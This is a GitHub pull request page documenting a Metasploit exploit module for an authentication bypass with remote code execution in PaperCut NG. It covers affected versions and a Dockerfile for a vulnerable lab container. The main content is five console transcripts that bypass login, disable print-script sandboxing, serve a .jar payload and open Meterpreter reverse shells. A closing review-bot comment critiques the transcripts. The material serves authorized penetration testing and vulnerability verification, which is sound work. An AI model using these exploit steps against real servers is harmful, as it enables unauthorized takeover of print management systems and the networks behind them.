PaperCutNG Authentication Bypass with RCE #17936

Merged
merged 40 commits into from Jun 7, 2023
40 commits
253f4e5
rough pseudo-coding
catatonicprime Apr 21, 2023
2010993
Command injection PoC working.
catatonicprime Apr 23, 2023
1a823b0
Serve jar file for exploit.
catatonicprime Apr 25, 2023
17271f1
Adding documentation, expanding failure cases. Always struggle in the…
catatonicprime Apr 25, 2023
a229a0e
If you are receiving 200, that is hard-evidence of bypass. Also Fix t…
catatonicprime Apr 25, 2023
8a9871f
Default to a java payload.
catatonicprime Apr 25, 2023
22238a0
Adding references.
catatonicprime Apr 26, 2023
8c87660
Explicit stance.
catatonicprime Apr 26, 2023
bcafd22
Better defaults pattern for TARGETURI.
catatonicprime Apr 26, 2023
0cf5f4c
More accurate list of side effects.
catatonicprime Apr 26, 2023
8694bee
Removing unnecessary search.
catatonicprime Apr 26, 2023
9f6fe96
bypass_auth returns the anti-csrf token and vprints active session on…
catatonicprime Apr 26, 2023
5e93669
Enable AutoCheck
catatonicprime Apr 26, 2023
0be38eb
method should do one thing and do it well
catatonicprime Apr 26, 2023
feec15a
full_uri has what we need for the origin header
catatonicprime Apr 27, 2023
16ae6b7
Use the generated payload as is.
catatonicprime Apr 27, 2023
12f7134
generating payloads on the fly is what we wanted originally
catatonicprime Apr 27, 2023
c0be991
removing superfluous options
catatonicprime Apr 28, 2023
4ba8d62
Removing unused documentation
catatonicprime Apr 28, 2023
97a76e3
linting changes. removing unnecessary success checks.
catatonicprime Apr 28, 2023
5f12f0e
Apply suggestions from code review
catatonicprime May 5, 2023
f276487
Adding original ZDI reference. Minor formatting changes.
catatonicprime May 5, 2023
e37e506
heh, I probably should have tested this
catatonicprime May 6, 2023
af3c482
heh, I probably should have tested that too
catatonicprime May 6, 2023
0448d40
Match wording from "How to write a module using HttpServer and HttpCl…
catatonicprime May 6, 2023
c69ca39
consistent indenting
catatonicprime May 6, 2023
43564b5
Removing unneeded features/options.
catatonicprime May 9, 2023
eff189f
Ensuring csrf_token is initialized.
catatonicprime May 9, 2023
c5b0bc6
Improved automatic targeting, tested back to major version 14
catatonicprime May 9, 2023
cb2c6a7
Prevent bypass_auth from being called twice when AutoCheck is true
catatonicprime May 11, 2023
d50bd24
Adding config cleanup.
catatonicprime May 11, 2023
c43eaf8
Adding documentation.
catatonicprime May 11, 2023
a445b07
removing unnecessary call to payload_uri
catatonicprime May 11, 2023
cbf850b
Apparently the comment after the rescue squelches the linter.
catatonicprime May 30, 2023
b376dac
okay linter
catatonicprime May 30, 2023
530ed91
Fixing ZDI ID
catatonicprime May 30, 2023
6ad9ebb
Update modules/exploits/multi/http/papercut_ng_auth_bypass.rb
catatonicprime May 31, 2023
6351c66
Update modules/exploits/multi/http/papercut_ng_auth_bypass.rb
catatonicprime May 31, 2023
3875947
Removing unnecessary assignment
catatonicprime May 31, 2023
a03603d
Documentation linting.
catatonicprime Jun 6, 2023
219 changes: 219 additions & 0 deletions documentation/modules/exploit/multi/http/papercut_ng_auth_bypass.md
@@ -0,0 +1,219 @@
## Vulnerable Application
### Description
PaperCut NG Authentication Bypass affecting the below versions, see
[confirmation](https://www.papercut.com/kb/Main/PO-1216-and-PO-1219#product-status-and-next-steps):
- version 8.0.0 to 19.2.7 (inclusive)
- version 20.0.0 to 20.1.6 (inclusive)
- version 21.0.0 to 21.2.10 (inclusive)
- version 22.0.0 to 22.0.8 (inclusive)

See module `info` for additional references.

### Building a Vulnerable Container
Papercut NG can be run in a container. This is useful for creating test environments for verification. To acquire past versions of the
software, i.e. known vulnerable versions, see [Download past/old PaperCut NG Versions](https://www.papercut.com/kb/Main/PastVersions).

Versions 16 and later include a "--non-interactive" switch, easing installation. Below I use podman on Centos 9 Stream to containerize the
application for testing.

From an empty directory, create a Dockerfile containing the following:
```dockerfile
FROM almalinux
RUN yum install -y procps-ng net-tools cpio sudo perl which
RUN yum install -y initscripts
RUN useradd -ms /bin/bash papercut
RUN usermod -a -G wheel papercut
RUN echo "papercut ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers

COPY pcng-setup-*.sh /

USER papercut
WORKDIR /home/papercut
```

Download a vulnerable version. Build a container. Run the container while performing the installation.
```sh
curl -OJ "https://cdn.papercut.com/files/pcng/16.x/pcng-setup-16.4.39159-linux-x64.sh"
podman build . --tag papercut-16.4.39159
podman run -it --rm -p 9191:9191 localhost/papercut-16.4.39159 /bin/bash -c "sh /*.sh --non-interactive; read"
```
Note: *Be sure to cross reference the target version with the known vulnerable versions, as some of the links in the listed Past Versions
are patched.*

A URL will be provided in the console to access the application, but you will likely need to use an IP accessible from your metasploit
host, e.g. [127.0.0.1](http://127.0.0.1:9191/admin) in order to complete the application setup. After setup, you may commit changes to the
container & tag the new image to maintain your configuration changes. In the future the service can be restarted using
`/etc/init.d/papercut start` from within the container.

*Caveat: When first starting the server or after completing the installation, at least one user needs to login. I think this has something
to do with getting the license manager into the correct state (i.e. loading the license). When this is not yet done then the Authentication
Bypass is still functional leading to a "Target Vulnerable" message during `check`. However, when attempting to select the
"\[Template Printer\]" a redirect to the About page occurs instead. Ensuring a logon can be done by using the "Login" button presented on
the SetupCompleted page used for the bypass. This scenario is not covered in the module as it is unlikely to be an issue on any network
that is currently in use.*


## Verification Steps

1. `./msfconsole -q`
2. `use multi/http/papercut_ng_auth_bypass`
3. `set RHOSTS [target]`
4. `run`

## Scenarios

### Tested on Linux x64 with PaperCut NG Version 22.0.8.65201
```
msf6 > use exploit/multi/http/papercut_ng_auth_bypass
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
RHOSTS => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
LHOST => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > run

[-] Handler failed to bind to 10.0.4.101:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Bypass successful and created session: JSESSIONID=node0cwd0h7aut351pzjcifwvdyg25.node0
[+] The target is vulnerable.
[*] Setting server option 'print-and-device.script.enabled' to 'Y') was 'N'
[*] Setting server option 'print.script.sandboxed' to 'N') was 'Y'
[*] Using URL: http://10.0.4.101:8080/rYrjrI0
[*] Server started.
[*] Sending payload for requested uri: /rYrjrI0.jar
[*] Sending payload for requested uri: /rYrjrI0.jar
[*] Sending stage (58851 bytes) to 10.0.2.100
[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:46224) at 2023-05-11 01:13:29 +0000
[*] Server stopped.
[*] rolling back 'print.script.sandboxed' to 'Y'
[*] Setting server option 'print.script.sandboxed' to 'Y') was 'N'
[*] rolling back 'print-and-device.script.enabled' to 'N'
[*] Setting server option 'print-and-device.script.enabled' to 'N') was 'Y'

meterpreter >
```
Note: Sandboxing is enabled by default in this version, scripting must be enabled and sandboxing must be disabled.


### Tested on Linux x64 with PaperCut NG Version 19.2.7.62200
```
msf6 > use exploit/multi/http/papercut_ng_auth_bypass
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
RHOSTS => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
LHOST => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > run

[-] Handler failed to bind to 10.0.4.101:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Bypass successful and created session: JSESSIONID=node01j4of6hup0i131vs585edo0uqb2.node0
[+] The target is vulnerable.
[*] Setting server option 'print-and-device.script.enabled' to 'Y') was 'N'
[*] Setting server option 'print.script.sandboxed' to 'N') was 'Y'
[*] Using URL: http://10.0.4.101:8080/PWMM7S32xpRY7
[*] Server started.
[*] Sending payload for requested uri: /PWMM7S32xpRY7.jar
[*] Sending payload for requested uri: /PWMM7S32xpRY7.jar
[*] Sending stage (58851 bytes) to 10.0.2.100
[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:35072) at 2023-05-11 01:25:25 +0000
[*] Server stopped.
[*] Rolling back 'print.script.sandboxed' to 'Y'
[*] Setting server option 'print.script.sandboxed' to 'Y') was 'N'
[*] Rolling back 'print-and-device.script.enabled' to 'N'
[*] Setting server option 'print-and-device.script.enabled' to 'N') was 'Y'

meterpreter >
```
Note: Sandboxing is enabled by default in this version, scripting must be enabled and sandboxing must be disabled.


### Tested on Linux x64 with PaperCut NG Version 18.3.9.49588d
```
msf6 > use exploit/multi/http/papercut_ng_auth_bypass
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
RHOSTS => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
LHOST => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > run

[-] Handler failed to bind to 10.0.4.101:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Bypass successful and created session: JSESSIONID=node0re9f1cbww5v11qgrc7y4g9qv3.node0
[+] The target is vulnerable.
[*] Using URL: http://10.0.4.101:8080/o30YxAzAA69ISJ8
[*] Server started.
[*] Sending payload for requested uri: /o30YxAzAA69ISJ8.jar
[*] Sending stage (58851 bytes) to 10.0.2.100
[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:40328) at 2023-05-11 02:29:15 +0000
[*] Server stopped.

meterpreter >
```

### Tested on Linux x64 with PaperCut NG Version 16.4.39159
```
msf6 > use exploit/multi/http/papercut_ng_auth_bypass
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
RHOSTS => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
LHOST => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > run

[-] Handler failed to bind to 10.0.4.101:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Bypass successful and created session: JSESSIONID=e79i55m6n77ex4p6ee3fu8u9
[+] The target is vulnerable.
[*] Using URL: http://10.0.4.101:8080/GuHN8K
[*] Server started.
[*] Sending payload for requested uri: /GuHN8K.jar
[*] Sending stage (58851 bytes) to 10.0.2.100
[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:58324) at 2023-05-11 03:22:13 +0000
[*] Server stopped.

meterpreter >
```
Note: The 'Form0' parameter for version 16 and lower does not take an additional '$Submit$1' value.

### Tested on Linux x64 with PaperCut NG Version 14.3.30457
```
msf6 > use exploit/multi/http/papercut_ng_auth_bypass
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
RHOSTS => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
LHOST => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > run

[-] Handler failed to bind to 10.0.4.101:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Bypass successful and created session: JSESSIONID=b9g3gepapev0
[+] The target is vulnerable.
[*] Using URL: http://10.0.4.101:8080/kBXJNp
[*] Server started.
[*] Sending payload for requested uri: /kBXJNp.jar
[*] Sending stage (58851 bytes) to 10.0.2.100
[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:32852) at 2023-05-11 03:56:24 +0000
[*] Server stopped.

meterpreter >
```
Note: Version 14, and possibly earlier, use a different HTML element to report the active version when exercising the vulnerable
'SetupCompleted' page.
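Review bot: every transcript in the Scenarios section sets `LHOST 10.0.4.101`, the same address as `RHOSTS`, which is why each run opens with `[-] Handler failed to bind to 10.0.4.101:4444:- -` and falls back to `0.0.0.0:4444`; re-capture the runs with LHOST set to the Metasploit host so the documented output shows a clean handler start. Two smaller points in the same transcripts: the vprint `Setting server option 'print-and-device.script.enabled' to 'Y') was 'N'` carries a stray `)` that should be fixed in the module before the output is pasted, and the 22.0.8 run prints `rolling back` while the 19.2.7 run prints `Rolling back`, which suggests the captures come from different module revisions and should be regenerated from the final one. Finally, the doc should spell out the side effects the output reveals: on 19.x and 22.x the module flips `print-and-device.script.enabled` to `Y` and `print.script.sandboxed` to `N` and only rolls them back after `Server stopped.`, so a run aborted between those points leaves the target with scripting enabled and sandboxing disabled; a sentence telling operators to verify those two options after an interrupted run belongs under the 22.0.8 and 19.2.7 notes.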